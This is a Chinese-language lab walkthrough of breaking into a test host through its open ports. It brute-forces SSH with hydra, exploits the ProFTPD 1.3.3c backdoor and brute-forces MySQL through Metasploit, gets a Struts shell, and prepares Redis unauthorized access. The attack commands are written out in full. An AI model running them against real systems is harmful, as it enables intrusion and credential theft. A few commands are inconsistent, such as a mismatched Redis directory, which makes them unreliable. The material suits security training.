常見的端口漏洞入侵主機
涉及知識點
端口漏洞利用
當我們滲透一個網站時發現從網站滲透不進去的時候,就可以查看該網站主機開啟了哪些端口,來從其開啟的端口來進行入侵
一旦端口開放的話就可以從外部訪問,操作系統都有或多或少的漏洞,特殊的請求或者指令觸發之后就可以提升權限
實驗環境
同一網段的兩臺主機:
入侵主機:kali
目標主機ip:192.168.31.69
使用kali和它本身自帶的一些工具對受害主機進行入侵
先利用nmap對受害主機進行掃描查看其開啟了哪些端口和服務

訪問該ip發現80端口是一個phpinfo頁面,無法利用80端口入侵

所以我們開始嘗試從其他端口入侵該主機
22端口漏洞利用
發現其開啟了22端口,22端口是SSH遠程登錄協議。最有可能利用的是弱口令的入侵。
使用kali自帶hydra來進行暴力破解22端口
暴力破解ssh命令:
hydra -L /root/桌面/username.txt -P /root/桌面/password.txt -vV -o ssh.log -e ns -f 192.168.31.69 ssh
參數詳解:
-L //暴力破解用戶名字典
-P //暴力破解密碼字典
-o ssh.log //輸出到這個文件里
-vV //顯示過程
-f //搜到賬號密碼就停止

經過一段時間的等待發現功夫不負有心人,還真破解出了22端口的登錄賬號密碼

然后我們就可以使用破解出來的賬號密碼成功利用22端口遠程登錄主機并且發現是root權限

21端口漏洞利用
通過nmap掃描知道21端口開啟的ftp版本是ProFTPD 1.3.3c,百度發現ProFTPD 1.3.3c有個后門命令執行漏洞

啟動msfconsole

搜索ProFTPD 1.3.3c查看其漏洞模塊
search ProFTPD 1.3.3c

切換到該漏洞模塊下,并設置好目標ip
use exploit/unix/ftp/proftpd_133c_backdoor set RHOSTS 192.168.31.69 run

成功反彈shell會話

3306端口漏洞利用
發現該主機還開啟了3306端口,那么我們如何利用3306端口入侵目標主機呢?
3306端口是MySQL的默認端口,入侵者可以通過入侵3306端口來入侵我們的主機,在Metasploitable系統中,Mysql的身份認證存在漏洞,這個漏洞可以讓攻擊者不必提供正確的身份證書便可訪問Mysql數據庫
啟動msfconsole

掃描mysql模塊
msf5 > search mysql

選擇MySQL可用模塊,在模塊中選擇滲透工具模塊進行攻擊
這里我們切換到mysql掃描模塊,設置模塊有效選項
msf5 > use auxiliary/scanner/mysql/mysql_login msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.31.69 #設置目標ip txt5 auxiliary(scanner/mysql/mysql_login) > set USER_FILE /root/桌面/username.txt #設置用戶名字典 txt5 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/桌面/password.txt #設置密碼字典 msf5 auxiliary(scanner/mysql/mysql_login) > set STOP_ON_SUCCESS true #破解成功時停止 msf5 auxiliary(scanner/mysql/mysql_login) >run #開始爆破
成功爆破出MySQL用戶名密碼

利用爆破出的賬號密碼成功登錄MySQL數據庫

8080端口入侵
發現8080端口有一個網站Struts,百度發現Struts可以使用Struts Scan工具獲得指定漏洞交互式shell
下載Struts Scan解壓,并切換到struts-scan-master目錄下
執行root@kali:~/桌面/struts-scan-master# python struts-scan.py
出現如下界面則安裝成功

使用給出的指定漏洞交互shell執行payload
成功獲得交互式shell
6379端口漏洞入侵
該主機還開啟了6379端口,發現6379端口可以利用Redis未授權訪問漏洞來入侵
在本地下載Redis并解壓安裝
wget http://download.redis.io/releases/redis-4.0.8.tar.gz tar xzf redis-4.0.8.tar.gz cd redis-3.2.0 make

修改配置文件,使可以遠程訪問
在bind 127.0.0.1前面加上#將其注釋掉
把protected-mode后面的yes設為no

啟動redis-server
./src/redis-server redis.conf
如果報錯執行下列命令
cd /root/redis-4.0.8/src

然后連接redis發現成功連接
